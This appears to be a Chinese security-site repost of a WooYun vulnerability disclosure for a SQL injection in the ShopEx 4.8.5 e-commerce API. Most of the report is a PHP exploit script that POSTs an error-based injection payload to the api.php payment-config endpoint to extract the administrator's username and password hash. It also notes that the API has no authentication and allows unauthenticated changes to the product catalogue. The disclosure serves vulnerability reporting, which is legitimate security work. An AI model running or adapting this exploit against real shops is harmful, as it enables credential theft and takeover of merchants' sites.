热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

shopEx 4.8.5.78660 SQL注入

发布时间:2013-10-02 12:13文章来源:wooyun文章作者:viekst 点击次数:
摘要:漏洞作者: viekst 提交时间: 2013-07-02 13:02 公开时间: 2013-09-30 13:03 漏洞类型: SQL注射漏洞 简要描述: shopEx 最新版的API注入一处 详细说明: 缺陷文件:F:\www\php\shopex-single-4.8.5.78660\core\api\payment\2.0\api_b2b_2_0_payment_cfg.p...

漏洞作者: viekst

提交时间: 2013-07-02 13:02
公开时间: 2013-09-30 13:03

漏洞类型: SQL注射漏洞
简要描述:

shopEx 最新版的API注入一处
详细说明:

缺陷文件:F:\www\php\shopex-single-4.8.5.78660\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php

 

和F:\www\php\shopex-single-4.8.5.78660\core\api\payment\1.0\api_b2b_2_0_payment_cfg.php

 

第44行 $data['columns'] 未做过滤导致注入

  1. <?php 
  2.  
  3.     set_time_limit(0); 
  4.  
  5.     ob_flush(); 
  6.  
  7.     echo 'Test: http://www.yunsec.net'."\r\n";    
  8.  
  9.     $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'
  10.  
  11.     $url='http://www.yunsec.net/api.php?act=search_payment_cfg_list&api_version=2.0';   
  12.  
  13.     $ch = curl_init();   
  14.  
  15.     curl_setopt($ch, CURLOPT_POST, 1);   
  16.  
  17.     curl_setopt($ch, CURLOPT_URL,$url);   
  18.  
  19.     curl_setopt($ch, CURLOPT_POSTFIELDS, $sql);   
  20.  
  21.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
  22.  
  23.     flush(); 
  24.  
  25.     $data = curl_exec($ch);   
  26.  
  27.     echo $data; 
  28.  
  29.     curl_close($ch); 
  30.  
  31.  ?> 

 

外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.

漏洞证明:

shopEx 4.8.5.78660 SQL注入

 

标签分类:

上一篇:WordPress < 3.6.1 PHP 对象注入漏洞
下一篇:HDWiki Xss+CSRF 可用GetShell 0day